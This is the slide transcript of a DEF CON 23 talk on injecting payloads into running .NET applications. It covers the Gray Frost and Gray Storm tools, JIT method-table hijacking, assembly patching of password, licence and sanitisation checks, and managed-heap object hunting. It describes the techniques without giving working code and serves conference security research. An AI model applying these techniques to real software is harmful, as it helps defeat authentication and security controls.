Upgrade to Pro — share decks privately, control downloads, hide ads and more …

DEF CON 23 - Hijacking Arbitrary .NET Application Control Flow

DEF CON 23 - Hijacking Arbitrary .NET Application Control Flow

This speech will demonstrate attacking .NET applications at runtime. I will show how to modify running applications with advanced .NET and assembly level attacks that alter the control flow of any .NET application. New attack techniques and tools will be released to allow penetration testers and attackers to carry out advanced post exploitation attacks.

This presentation gives an overview of how to use these tools in a real attack sequence and gives a view into the .NET hacker space.

Topher Timzen

August 09, 2015
Tweet

More Decks by Topher Timzen

Other Decks in Technology

Transcript

  1. Hijacking Arbitrary .NET
    Application Control Flow
    Topher Timzen

    View Slide

  2. Security Researcher, Intel
    Security Trainer
    TopherTimzen.com
    @TTimzen
    #whoami

    View Slide

  3. Overview
    .NET?
    Runtime Attacks
    Modify Control Flow
    Machine Code Editing
    Managed Heap

    View Slide

  4. Tools Released
    Use .NET to attack
    Using Objects on the Heap
    Why are we Here?

    View Slide

  5. CLR Attacks
    Controlling the Common Language
    Runtime
    Accessing raw objects on Managed Heap
    Manipulate AppDomains
    • Controlling all Loaded Code
    • Controlling Just-In-Time Compilation

    View Slide

  6. Attack With ASM
    Manipulate Resources
    Attack methods at ASM level
    Alter application control flow

    View Slide

  7. Runtime
    .NET Process
    CLR (2.0/4.0) & AppDomains
    Assemblies (.EXE and .DLL(s))
    Objects
    Properties
    Fields
    Instance Methods
    Classes
    Methods
    Logic

    View Slide

  8. Gray Frost
    &
    Gray Storm
    The Tools

    View Slide

  9. Gray Frost

    View Slide

  10. Gray Frost
    Payload delivery system
    C++ .NET CLR Bootstrapper
    Creates or injects 4.0 runtime
    Capability to pivot into 2.0 runtime
    Contains raw payload
    2 Rounds
    GrayFrostCpp
    GrayFrostCSharp
    • C# Payload

    View Slide

  11. Round 1
    .NET Process

    View Slide

  12. Round 1
    Mscoree
    GrayFrostCpp

    View Slide

  13. Round 1
    GrayFrostCpp

    View Slide

  14. Round 1
    GrayFrostCSharp
    GrayFrostCpp

    View Slide

  15. Round 2
    .NET Process

    View Slide

  16. Round 2
    .NET Process
    GrayFrostCSharp

    View Slide

  17. Round 2
    .NET Process
    payload void
    main()
    GrayFrostCSharp

    View Slide

  18. Round 2
    .NET Process
    Payload

    View Slide

  19. .NET Process
    Pivoting Between runtimes

    View Slide

  20. Mscoree
    GrayFrostCpp
    Pivoting Between runtimes

    View Slide

  21. GrayFrostCpp
    Pivoting Between runtimes

    View Slide

  22. GrayFrostCSharp
    GrayFrostCpp
    Pivoting Between runtimes

    View Slide

  23. GrayFrostCSharp
    GrayFrostCpp
    Pivoting Between runtimes

    View Slide

  24. GrayFrostCpp
    Pivoting Between runtimes

    View Slide

  25. GrayFrostCSharp
    GrayFrostCpp
    Pivoting Between runtimes

    View Slide

  26. GrayFrostCSharp
    GrayFrostCpp
    Pivoting Between runtimes

    View Slide

  27. Gray Storm

    View Slide

  28. Gray Storm
    Reconnaissance and In-memory attack
    payload
    Features
    Attacking the .NET JIT
    Attacking .NET at the ASM level
    ASM and Metasploit payloads
    Utilize objects on the Managed Heap

    View Slide

  29. Gray Storm Usage

    View Slide

  30. Controlling the JIT
    Method Tables contain address of JIT
    stub for a class’s methods.
    During JIT the Method Table is referenced
    We can control the address
    Lives after Garbage Collection

    View Slide

  31. Controlling the JIT

    View Slide

  32. Controlling the JIT

    View Slide

  33. Control Flow Attacks
    .NET uses far and relative calls
    0xE8; Call [imm]
     0xFF 0x15; Call dword
    segmentRegister[imm]
    relCall = dstAddress - (currentLocation+ lenOfCall)

    View Slide

  34. ASM Payloads
    Address of a method known through
    Reflection
    Overwrite method logic with new ASM
    Steal stack parameters
    Change events

    View Slide

  35. ASM Payloads
    Change return TRUE to return FALSE
    Password validation
    Key & Licensing validation
    SQL Sanitization
    Destroy security Mechanisms
    Overwrite logic
    Update Mechanisms

    View Slide

  36. ASM Payloads

    View Slide

  37. ASM Payloads
    Metasploit
    Hand Rolled
    Portable Environment Block (PEB) changes

    View Slide

  38. Portable Environment Block
    http://www.tophertimzen.com/blog/shellcodeDotNetPEB/

    View Slide

  39. Object Hunting in Memory

    View Slide

  40. Managed Heap
    Storage point for .NET Objects
    New reference objects added to heap
    Garbage Collector removes dead
    objects

    View Slide

  41. Managed Heap
    Storage point for .NET Objects
    New reference objects added to heap
    Garbage Collector removes dead
    objects
    Let’s manipulate it!

    View Slide

  42. Object Hunting in Memory
    Objects are IntPtrs
    Point to Object Instance on Managed Heap
    All instantiated objects of the same class share
    the same Method Table
    Reflection Object Hunting
    Win

    View Slide

  43. Finding Objects at Runtime
    i. Construct an object and find location
    of Managed Heap
    ii. Signature instantiated type
    iii. Scan Managed Heap for object pointers
    iv. Convert object pointers to raw objects
    v. ????
    vi. PROFIT

    View Slide

  44. Finding Objects at Runtime
    i. Construct an object and find location
    of Managed Heap
    ii. Signature instantiated type
    iii. Scan Managed Heap for object pointers
    iv. Convert object pointers to raw objects
    v. ????
    vi. PROFIT

    View Slide

  45. Construct an Object
    Use Reflection to invoke a constructor
    Can instantiate any object
    If a constructor takes other objects,
    nullify them
    https://gist.github.com/tophertimzen/010b19fdbde77f251414

    View Slide

  46. IntPtr = 024e9fe8
    024e9fe8 (Object)
    00000005
    00000001
    00000000
    IntPtr = 5
    STACK
    024e9fe8 (Object)
    L
    H
    https://gist.github.com/tophertimzen/812aa20dbe23cb42756d
    Find location of Managed Heap

    View Slide

  47. IntPtr = 024e9fe8
    024e9fe8 (Object)
    00000005
    00000001
    00000000
    IntPtr = 5
    STACK
    Managed Heap
    024e9fe8 (Object)
    L
    H
    https://gist.github.com/tophertimzen/812aa20dbe23cb42756d
    Find location of Managed Heap

    View Slide

  48. IntPtr = 024e9fe8
    024e9fe8 (Object)
    00000005
    00000001
    00000000
    IntPtr = 5
    STACK
    024e9fe8 (Object)
    L
    H
    https://gist.github.com/tophertimzen/812aa20dbe23cb42756d
    Find location of Managed Heap

    View Slide

  49. IntPtr = 024e9fe8
    024e9fe8 (Object)
    00000005
    00000001
    00000000
    STACK
    L
    H
    https://gist.github.com/tophertimzen/812aa20dbe23cb42756d
    Find location of Managed Heap

    View Slide

  50. Finding Objects at Runtime
    i. Construct an object and find location
    of Managed Heap
    ii. Signature instantiated type
    iii. Scan Managed Heap for object pointers
    iv. Convert object pointers to raw objects
    v. ????
    vi. PROFIT

    View Slide

  51. Signature instantiated type
    Object Instances contain a Method Table
    pointer to their corresponding type.
    (x86)
    Bytes 0-3 are the Method Table (MT)
    Bytes 4-7 in MT is Instance Size
    0:009> dd 024e9fe8
    024e9fe8 00774828 0000038c 00000001 00000000

    View Slide

  52. Signature instantiated type
    Object Instances contain a Method Table
    pointer to their corresponding type.
    (x64)
    Bytes 0-7 are the Method Table (MT)
    Bytes 8-11 in MT is Instance Size
    0:008> dd 00000000024e9fe8
    00000000`0286b8e0 ea774828 000007fe

    View Slide

  53. Finding Objects at Runtime
    i. Construct an object and find location
    of Managed Heap
    ii. Signature instantiated type
    iii. Scan Managed Heap for object pointers
    iv. Convert object pointers to raw objects
    v. ????
    vi. PROFIT

    View Slide

  54. Scan Managed Heap
    Scan down incrementing by size of object
    Scan linearly up to top of heap
    Compare object’s Method Table to the
    reference
    If they match, get IntPtr address of object

    View Slide

  55. Finding Objects at Runtime
    i. Construct an object and find location
    of Managed Heap
    ii. Signature instantiated type
    iii. Scan Managed Heap for object pointers
    iv. Convert object pointers to raw objects
    v. ????
    vi. PROFIT

    View Slide

  56. Convert object ptr -> raw obj
    STACK
    Refer (System.IntPtr)
    pointer(024ea00c )
    pointer(024ea00c )
    L
    H
    https://gist.github.com/tophertimzen/1da2b0aab6245ed1c27b

    View Slide

  57. Convert object ptr -> raw obj
    STACK
    Refer (System.IntPtr)
    pointer(024ea00c )
    pointer(024ea00c )
    L
    H
    https://gist.github.com/tophertimzen/1da2b0aab6245ed1c27b

    View Slide

  58. Convert object ptr -> raw obj
    Refer (GrayStorm.testClass)
    pointer(024ea00c )
    STACK
    L
    H
    https://gist.github.com/tophertimzen/1da2b0aab6245ed1c27b

    View Slide

  59. Finding Objects at Runtime
    i. Construct an object and find location
    of Managed Heap
    ii. Signature instantiated type
    iii. Scan Managed Heap for object pointers
    iv. Convert object pointers to raw objects
    v. ????
    vi. PROFIT

    View Slide

  60. ????

    View Slide

  61. PROFIT

    View Slide

  62. Superpowers and Things?
    Change Keys
    Change Fields / Properties
    Call Methods
    With arguments!

    View Slide

  63. Automation

    View Slide

  64. Automation
    GrayFrost can be used with automated
    payloads

    View Slide

  65. Constructing Attack Chains

    View Slide

  66. How to construct attack chains
    Gray Wolf / IL Decompiler
     Find Methods, Fields & Properties of
    interest
     Locate meaningful objects
     Discover high level control flow
    Gray Storm “Debugging” functionality
     Breakpoint at constructors or methods
    from Method Pointers
     Use with WinDbg
    Utilize DLL Hijacking!

    View Slide

  67. Hybrid .NET/ASM Attacks
    Hybrid C#/ASM code in .NET
    Encrypting .NET payloads and
    unwinding
    Encrypting ASM Payloads

    View Slide

  68. Payload System
    C# is easy
    Can use Gray Frost in any
    application
    Low and High level gap is easy

    View Slide

  69. .NET Hacking Space
    Small
    Few tools
    Mostly hacking WoW
    Lots of PowerShell
    Previous DEF CON talks
    DEF CON 18 & 19 - Jon McCoy

    View Slide

  70. Conclusion
    Arbitrary .NET applications can
    be injected and changed
    New .NET attack possibilities
    New tools that support
    automation
    Get Gray Frost and Storm
    github.com/graykernel

    View Slide

  71. Questions?
    Contact Me
    @TTimzen
    https://www.tophertimzen.com
    Get Gray Frost and Storm
    github.com/graykernel
    White Papers
    Hijacking Arbitrary .NET Application Control Flow
    Acquiring .NET Objects from the Managed Heap

    View Slide